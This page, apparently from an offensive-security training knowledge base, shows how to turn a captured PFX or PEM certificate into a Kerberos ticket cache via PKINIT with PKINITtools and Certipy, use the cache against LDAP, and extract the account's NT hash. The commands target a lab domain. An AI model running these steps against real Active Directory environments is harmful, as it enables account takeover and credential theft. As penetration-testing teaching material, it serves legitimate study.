Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Tickets / Converting

PFX to CCACHE

Certificate-based Kerberos uses PKINIT. When we have a certificate or PFX for an account, we request a TGT and store it as a ccache using PKINITtools or Certipy.

PEM certificate and key to ccache with PKINITtools:

gettgtpkinit.py -cert-pem user.crt -key-pem user.key ootw.local/student student.ccache
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist

PFX to ccache with PKINITtools:

gettgtpkinit.py -cert-pfx student.pfx -pfx-pass 'PfxPass2026!' ootw.local/student student.ccache
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist

PFX to ccache with Certipy:

certipy auth -pfx student.pfx -password 'PfxPass2026!' -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=FILE:$(pwd)/student.ccache
klist

Use the resulting cache:

ldapsearch -Y GSSAPI -H ldap://dc01.ootw.local -b 'DC=ootw,DC=local' '(sAMAccountName=student)'
nxc ldap 10.10.10.200 -d ootw.local -u student -k --use-kcache

Extract NT hash after PKINIT with PKINITtools:

export KRB5CCNAME=FILE:$(pwd)/student.ccache
getnthash.py -key 0123456789abcdef0123456789abcdef ootw.local/student

The -key value is the AS-REP encryption key printed by gettgtpkinit.py. Keep it with the ccache until the workflow is complete.